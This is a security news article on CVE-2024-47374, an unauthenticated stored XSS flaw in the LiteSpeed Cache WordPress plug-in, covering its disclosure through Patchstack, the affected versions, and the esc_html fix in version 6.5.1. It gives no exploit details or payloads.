6 Million WordPress Sites at Risk from XSS Vulnerability in LiteSpeed Cache Plug-In

October 7, 2024

A major security flaw has been identified in the LiteSpeed Cache plug-in for WordPress, which is installed on more than 6 million sites. The vulnerability, a cross-site scripting (XSS) flaw, could allow attackers to escalate privileges and potentially inject malicious code, enabling redirects, ads, and other HTML payloads onto an affected website. The flaw was discovered by a security researcher known as TaiYou, who reported it to Patchstack through its Bug Bounty Program for WordPress.

The vulnerability, tracked as CVE-2024-47374, affects LiteSpeed Cache versions up to 6.5.0.2. The plug-in is described as an 'all-in-one site acceleration plugin, featuring an exclusive server-level cache and a collection of optimization features' and is compatible with popular WordPress plug-ins such as WooCommerce, bbPress, and Yoast SEO. Users are urged to update immediately to prevent potential attacks.

The flaw is an unauthenticated stored XSS vulnerability that could allow any unauthenticated user to steal sensitive information or escalate privileges on the WordPress site by performing a single HTTP request, according to Patchstack. XSS is a common and often exploited web vulnerability that allows an attacker to inject malicious code into a legitimate webpage or application.

TaiYou discovered three flaws in the plug-in, including another XSS flaw and a path-traversal vulnerability. However, only CVE-2024-47374 is considered dangerous and expected to be exploited by attackers, according to Patchstack. Upon notification, the developers of the LiteSpeed Cache plug-in quickly provided a patch for validation. Patchstack then released an update that fixes all three flaws in LiteSpeed Cache version 6.5.1.

CVE-2024-47374 is characterized as creating 'Improper Neutralization of Input During Web Page Generation.' The vulnerability occurs because the code that handles the view of a queue in a part of the plug-in does not implement sanitization and output escaping. This vulnerability is particularly concerning due to the widespread use of WordPress and its plug-ins, which provide a broad attack surface for threat actors.

The patch for CVE-2024-47374 is relatively straightforward, sanitizing the output using esc_html. Patchstack issued a virtual patch to block any attacks until users have updated to the fixed version. In the meantime, all administrators of WordPress sites using LiteSpeed Cache are advised to update to the fixed version 6.5.1 immediately. Patchstack also recommends that WordPress website developers apply escaping and sanitization to any message that will be displayed as an admin notice to mitigate the vulnerability.

Related News

Latest News

Like what you see?

Get a digest of headlines, vulnerabilities, risk context, and more delivered to your inbox.

Subscribe Below

By submitting this form, you’re giving us permission to email you. You may unsubscribe at any time.

Accelerate Security Teams

Continuously identify and prioritize the risks that are most critical in your environment, and validate that your remediation efforts are reducing risk. An always-on single source-of-truth of your assets, services, and vulnerabilities.